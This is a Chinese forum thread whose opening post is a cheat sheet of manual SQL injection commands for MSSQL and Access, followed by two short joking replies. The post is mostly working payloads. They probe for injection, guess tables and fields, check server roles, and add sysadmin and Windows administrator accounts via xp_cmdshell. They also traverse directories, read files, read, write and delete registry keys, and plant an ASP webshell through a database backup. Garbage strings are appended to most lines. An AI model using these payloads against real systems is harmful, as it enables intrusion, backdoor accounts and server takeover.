社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3500阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 'kC#GTZi  
  2.初步判断是否是mssql ;and user>0 PI`Y%!P  
9@q!~ur  
  3.注入参数是字符'and [查询条件] and ''=' >4kQ9lXL  
eZ[Qhrc  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' r2'K'?T3  
6fI2y4yEz  
  5.判断数据库系统 L?j<KW  
<\Y(+?+uZ  
  ;and (select count(*) from sysobjects)>0 mssql 41Q)w=hoN  
hHVAN3e  
  ;and (select count(*) from msysobjects)>0 access S,Q^M )$  
H' /V<%  
/j$pV  
@sZ7Ka  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 X@tA+   
I(7iD. ^:  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ocK4Nxs  
]S@T|08b  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 -=8f*K[W  
@ %L  
  9.(1)猜字段的ascii值(access) lemV&$WN|  
XXA'B{@Y)  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 *WJK&  
p"~@q}3  
  (2)猜字段的ascii值(mssql) Vq`/]&  
+2 oZML  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 cl&?'` )  
Q$]1juqg  
  10.测试权限结构(mssql) t g-(e=S4P  
=1R 2`H\  
=LK`m NA  
.B2e$`s$  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- M!!vr8}  
!]A/ID0K  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- N5=}0s]e  
^mFsrw  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- w_@{v wM$A  
qk3 ~]</  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- .-& =\}^2l  
G:lhrT{  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ps,Kj3^T<  
zZRLFfz<9  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- t B`"gC~  
 f-[.^/  
  ;and 1=(select IS_MEMBER('db_owner'));-- <b _K*]Z  
sg}<()  
,%xat`d3,3  
N2[jBy8M  
  11.添加mssql和系统的帐户 @g;DA)!(  
%++: K  
  ;exec master.dbo.sp_addlogin username;-- }93FWo.  
  ;exec master.dbo.sp_password null,username,password;-- eX"Ecl{  
Rc4=zimr+  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- pxedj  
=+T0[|gc(r  
  ;exec master.dbo.xp_cmdshell 'net user username password S[/udA   
G"u4]!$/  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- US9aW)8  
x$TL j  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- wG)[Ik6:  
mdrqX<x'~  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- uTrzC+\aU  
aCQ[Uc<B:  
b3%a4Gg&  
Lwf[*n d  
  12.(1)遍历目录 uBg#zx  
W  wj+\  
  ;create table dirs(paths varchar(100), id int) k$J!,!q  
/=9dX; #  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' V62lN<M  
(]I=';\  
  ;and (select top 1 paths from dirs)>0 Wrp+B[ {r\  
>Sk%78={R  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) d`$w3Hy  
+cmi?~KS*  
<GQ=PrT|/  
\vV]fX   
  (2)遍历目录 u 6l)s0Q  
$[MAm)c:]{  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- KOXG=P0  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 0~W XA=XG  
Bv3B|D&+  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 `H*mQERb  
&X` lh P  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 tK*y/S  
lcReRcjm  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 knV*,   
oVbs^sbRH  
A(`Mwh+  
N:+EGmp  
  13.mssql中的存储过程 a x;<idC}  
T5T[$%]6  
  xp_regenumvalues 注册表根键, 子键 \j wxW6>  
p*YV*Arv  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 DyZ6&*s$  
0 .T5% _ /  
  xp_regread 根键,子键,键值名 :cXN Fu\C  
MuzQ z.C  
  ;exec xp_regread 7AGUi+!ICl  
D[6sy`5l  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ".#h$  
~Cynw(  
  xp_regwrite 根键,子键, 值名, 值类型, 值 ttlMZLX{TJ  
t&5Ne ?  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 eUR+j?5I  
ze5#6Vzd&  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 !-%%94Q  
*nHMQ/uf  
  xp_regdeletevalue 根键,子键,值名 152s<lu1Z  
lm&^`Bn)  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 4u41M,nJQd  
Z]k@pR !  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 En&gI`3n  
KE5>O1  
xy&*s\=:  
K~3Y8ca  
  14.mssql的backup创建webshell unz~vG1Tn  
QpoC-4F  
  use model U-,s/VQ?  
rqm":N8@  
  create table cmd(str image); tBl (E  
uocFOlU0n  
  insert into cmd(str) values (''); >T0`( #Lm  
e6{E(=R[M  
  backup database model to disk='c:\l.asp'; Hm|N {  
WI&}94w  
H%Lln#  
9 p^gF2?k  
  15.mssql内置函数  i?eVi  
D eT$4c*:[  
  ;and (select @@version)>0 获得Windows的版本号 UYW'pV  
oY; C[X  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa pY\ =f0]  
+/M%%:>mY  
  ;and (select user_name())>0 爆当前系统的连接用户 @" umY-1f  
,i;#e  
  ;and (select db_name())>0 得到当前连接的数据库 -m ;n}ECg  
itc\wn  
'W("s  
#Oq.}x?i  
  16.简洁的webshell a <F2]H=J  
> XM]UdP  
  use model X2:23j<  
,LmP >Q.  
  create table cmd(str image); 91q  
0plX"NU  
  insert into cmd(str) values (''); b8vZ^8tBV  
p:0X3?IG3  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
批量上传需要先选择文件,再选择上传
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八